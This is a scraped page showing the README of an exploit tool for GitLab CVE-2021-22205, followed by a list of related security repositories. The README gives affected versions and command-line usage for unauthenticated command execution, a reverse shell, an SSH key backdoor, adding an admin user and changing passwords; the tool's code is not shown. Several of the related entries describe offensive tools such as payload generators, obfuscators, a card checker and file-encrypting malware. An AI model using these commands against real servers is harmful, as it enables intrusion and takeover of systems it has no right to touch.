GitLab CE/EE Preauth RCE using ExifTool

Related tags

Security related resourcesgitlabpentest-scriptscve-2021-22205preauth-rce
Overview

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # 版本 & 漏洞探测
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # 命令执行 OOB 回显
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # 命令执行写文件回显
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # 反弹 SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH 后门植入
    python3 CVE-2021-22205.py -u site_url -m add user pass # 添加管理用户
    python3 CVE-2021-22205.py -u site_url -m mod user      # 修改 user 密码 => [email protected]
    python3 CVE-2021-22205.py -u site_url -m rec user      # 还原 user 密码

Screenshot

Detect:

image-20211111130659726

RCE(Echo via PostBin OOB):

image-20211111132623307

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

Owner
3ND
3ND
GitHub Repository
Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary.

Midas ELF64 Injector Description Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary. All you n

midas 20 Dec 24, 2022
Generate malicious files using recently published bidi-attack (CVE-2021-42574)

CVE-2021-42574 - Code generator Generate malicious files using recently published bidi-attack vulnerability, which was discovered in Unicode Specifica

js-on 7 Nov 09, 2022
Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率。

0x00 介绍 tig Threat Intelligence Gathering 威胁情报收集,旨在提高蓝队拿到攻击 IP 后对其进行威胁情报信息收集的效率,目前已集成微步、IP 域名反查、Fofa 信息收集、ICP 备案查询、IP 存活检测五个模块,现已支持以下信息的查询: ✅ 微步标签 ✅ I

Wolf Group Security Team 698 Dec 09, 2022
LaxrFar Python Obfuscator

LaxrFar Python Obfuscator Usage First do the things from "Upload to Webserver" o

LaxrFar 5 Jul 19, 2022
Bypass 4xx HTTP response status codes.

Forbidden Bypass 4xx HTTP response status codes. To see all the test cases, check the source code - follow the NOTE comments. Script uses multithreadi

Ivan Šincek 165 Dec 28, 2022
A python module for retrieving and parsing WHOIS data

pythonwhois A WHOIS retrieval and parsing library for Python. Dependencies None! All you need is the Python standard library. Instructions The manual

Sven Slootweg 384 Dec 23, 2022
Bandit is a tool designed to find common security issues in Python code.

A security linter from PyCQA Free software: Apache license Documentation: https://bandit.readthedocs.io/en/latest/ Source: https://github.com/PyCQA/ba

Python Code Quality Authority 4.8k Dec 31, 2022
Generate obfuscated meterpreter shells

Generator Evade AV with obfuscated payloads Installation must install dotnet prior to running the script with net45 Running ./generator.py -ip Your-I

Fawaz Al-Mutairi 219 Nov 28, 2022
Open-source jailbreaking tool for many iOS devices

Open-source jailbreaking tool for many iOS devices *Read disclaimer before using this software. checkm8 permanent unpatchable bootrom exploit for hund

6.7k Jan 05, 2023
log4j burp scanner

log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=

1 Jun 30, 2022
DoSer.py - Simple DoSer in Python

DoSer.py - Simple DoSer in Python What is DoSer? DoSer is basically an HTTP Denial of Service attack that affects threaded servers. It works like this

8 Sep 02, 2022
Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien

9.4k Jan 04, 2023
BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.

Follow us on Twitter! BoobSnail BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro gen

STM Cyber 232 Nov 21, 2022
Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VSS-AGENT service running on host)

VSSTrigger Coerce authentication from Windows hosts via MS-FSRVP (Requires FS-VS

Filip Dragovic 6 Jul 24, 2022
Script Crack Facebook Elite 🚶‍♂

elite Script Crack Facebook Elite 🚶‍♂ Install Script $ pkg update && pkg upgrade $ termux-setup-storage $ pkg install git $ pkg install python $ pip

Yumasaa 1 Jan 02, 2022
Credit Card And SK Checker Written In Python

💳 Credit Card Checker (CC Checker) & Mass SK Checker & Generator 💳

Rimuru Tempest 53 Dec 31, 2022
Hashpic - Hashpic creates an image from a MD5 or SHA512 hash

Hashpic Hashpic creates an image from the MD5 hash of your input. Since v0.2.0 i

0xflotus 15 Nov 23, 2022
Raphael is a vulnerability scanning tool based on Python3.

Raphael Raphael是一款基于Python3开发的插件式漏洞扫描工具。 Raphael is a vulnerability scanning too

b4zinga 5 Mar 21, 2022
A signature parser for hikari's command handler tanjun.

tanchi A signature parser for hikari's command handler tanjun. Finally be able to define your commands without those bloody decorator chains! Example

sadru 11 Nov 17, 2022
A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms

A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the Blackgound image of targets' computer. and decrypt the targets' encrypted files in our own compute

Li Ka Lok 2 Dec 02, 2022